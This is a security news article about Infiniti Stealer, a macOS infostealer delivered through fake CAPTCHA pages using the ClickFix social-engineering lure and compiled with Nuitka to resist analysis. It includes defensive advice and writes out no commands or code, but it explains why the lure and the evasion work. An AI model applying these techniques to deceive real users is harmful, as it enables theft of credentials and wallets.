Infiniti Stealer: macOS Malware Uses ClickFix and Nuitka Compilation

A previously undocumented macOS infostealer dubbed Infiniti Stealer has surfaced, combining ClickFix social engineering with Nuitka-compiled Python to create a payload that's both effective at tricking users and difficult to analyze. Malwarebytes Labs researchers, who initially tracked the malware as "NukeChain," identified it as the first documented macOS campaign pairing these two techniques.

The ClickFix Delivery Mechanism

Infiniti Stealer doesn't exploit software vulnerabilities. Instead, it relies on ClickFix, a social engineering technique that tricks users into executing malicious commands themselves.

The attack presents victims with a fake CAPTCHA verification page. Rather than the standard "click the images with traffic lights" challenge, the page instructs users to open Terminal and paste a command to "verify" they're human. The command downloads and executes the Infiniti Stealer payload.

This approach is devastatingly effective because it bypasses macOS security controls that would block unsigned applications downloaded from the internet. When users manually execute commands in Terminal, they're granting explicit permission for whatever happens next. Gatekeeper doesn't intervene because the user initiated the action.

ClickFix has become increasingly popular across platforms. We've seen it deployed in the PureLog Stealer campaigns targeting healthcare organizations and the Torg Grabber infections stealing cryptocurrency wallet credentials. The technique works because users have been trained to complete verification steps without questioning them.

Why Nuitka Matters

The payload itself is written in Python but compiled using Nuitka, a tool that converts Python code into native C executables. This approach creates several advantages for attackers:

1. Analysis complexity — Decompiling Nuitka binaries is significantly harder than reversing standard Python bytecode
2. Detection evasion — The resulting executable doesn't match signatures for known Python malware
3. Performance — Native code runs faster than interpreted Python
4. Dependencies — No Python interpreter required on the target system

Traditional Python malware can often be deobfuscated by extracting and reading the .pyc bytecode files. Nuitka compilation eliminates this attack surface for defenders, forcing them into more time-intensive binary analysis.

Microsoft documented similar Python-based infostealers targeting macOS in February, but those campaigns used standard Python execution rather than Nuitka compilation. Infiniti Stealer represents an evolution—attackers are learning from detection methods and adapting.

What Gets Stolen

While Malwarebytes confirmed Infiniti Stealer targets "sensitive data from Macs," the full capability list wasn't disclosed in their initial reporting. Based on similar macOS infostealers, likely targets include:

• Keychain passwords and certificates
• Browser credentials and cookies (Safari, Chrome, Firefox, Brave)
• Cryptocurrency wallet files and seed phrases
• SSH keys and cloud service credentials
• Messaging app databases (Telegram, Discord, Slack)
• Screenshots and clipboard contents

macOS users often assume they're immune to malware, making them particularly susceptible to social engineering. The platform's smaller market share means fewer attacks—but also means less user awareness about threats that do exist.

The Exposed Control Panel

In an operational security failure, the Infiniti Stealer control panel became publicly accessible before Malwarebytes published their findings. This exposed the malware's actual name (researchers had been tracking it as "NukeChain") and potentially revealed information about the operators.

Such exposures happen more often than attackers would like. Misconfigured servers, default credentials, and rushed deployments create windows where researchers—or competing criminals—can gather intelligence. The TetraLeaks incident earlier this year exposed a Vidar operation's full infrastructure through similar carelessness.

Protecting macOS Systems

For macOS users:

1. Never paste commands from websites — Legitimate CAPTCHA verifications never require Terminal commands
2. Keep Gatekeeper enabled — Don't disable macOS security features for convenience
3. Use a password manager — Reduces reliance on browser-stored credentials that malware targets
4. Enable FileVault — Full-disk encryption limits what attackers can access if they compromise your system
5. Monitor for suspicious Terminal activity — EDR solutions increasingly flag unusual command-line execution patterns

Organizations managing Mac fleets should ensure endpoint detection covers ClickFix patterns. The technique will continue spreading because it works, and macOS-focused variants will keep emerging.

The Cross-Platform Reality

Infiniti Stealer joins a growing ecosystem of macOS-targeted threats. The perception that "Macs don't get viruses" hasn't been true for years, but it persists in user behavior. Attackers know this, which is why ClickFix campaigns increasingly include macOS payloads alongside Windows variants.

The combination of social engineering and compiled Python creates a template other malware authors will copy. Expect more Nuitka-compiled macOS malware as attackers share techniques and tools. The first documented campaign rarely stays unique for long.

If you've recently completed a CAPTCHA that involved copying commands into Terminal, assume compromise. Check for unexpected processes, review recent network connections, and rotate credentials for any sensitive accounts accessed from the affected system.